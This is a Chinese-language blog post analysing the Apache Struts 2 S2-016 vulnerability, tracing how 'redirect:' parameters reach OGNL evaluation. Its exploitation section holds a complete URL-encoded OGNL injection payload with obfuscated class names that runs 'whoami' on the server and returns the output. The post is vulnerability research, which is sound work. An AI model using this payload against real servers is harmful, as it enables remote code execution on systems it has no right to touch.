Learning Man's Blog

s2-016 漏洞分析

字数统计: 416阅读时长: 1 min
2018/11/06

影响版本

Struts 2.0.0 - Struts 2.3.15

0x01 TIPs

主要成因动态代码调试默认开启,并注意上面的四个前缀

下面这个配置在这个版本里没作用,因为漏洞判断时候调用的都是DefaultActionMapper.allowDynamicMethodCalls

0x02 分析

跟进分析

  1. 使用的2.3.15的showcase,分为两个部分,StrutsPrepareFilter&StrutsExecuteFilter

  2. 先进入StrutsPrepareFilter进行准备工作,调用PrepareOperations.findActionMapping()

  3. 进入DefaultActionMapper.getMapping,调用handleSpecialParameters处理参数

  4. 检查是否有对应的特殊方法

  5. 对应的方法,在上图第二个断点处执行,提取redirect:后的字符串作为结果填充进mapping

  6. 在值栈中可见

  7. 回到StrutsPrepareFilter,执行chain.doFilter(这里先进入其他Filter)进入StrutsExecuteFilter

  8. 执行ExecuteOperations.executeAction()

  9. 进入Dispatcher,这里检查mapping中是否有Result,并进行处理

  10. 进入ServletRedirectResult(这是5中创建的结果类),调用父类StrutsResultSupport.execute()

    public void execute(ActionInvocation invocation) throws Exception {
        if (this.anchor != null) {
            this.anchor = this.conditionalParse(this.anchor, invocation);
        }
    
        super.execute(invocation);
    }
  11. 然后见到熟悉的

0x03 利用条件

漏洞版本

0x04 利用方式

action:redirect:redirectAction:均可用于攻击

http://localhost:8088/showcase.action?redirect:%24%7B%23req%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27)%2C%23s%3Dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27%5C%5Cs%27))).start().getInputStream()).useDelimiter(%27%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23resp%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27)%2C%23resp.setCharacterEncoding(%27UTF-8%27)%2C%23resp.getWriter().println(%23str)%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()%7D%0A

参考资料

  1. https://cwiki.apache.org/confluence/display/WW/S2-016
  2. https://www.jianshu.com/p/de165430e8a8
CATALOG
  1. 1. 0x01 TIPs
  2. 2. 0x02 分析
    1. 2.1. 跟进分析
  3. 3. 0x03 利用条件
  4. 4. 0x04 利用方式
  5. 5. 参考资料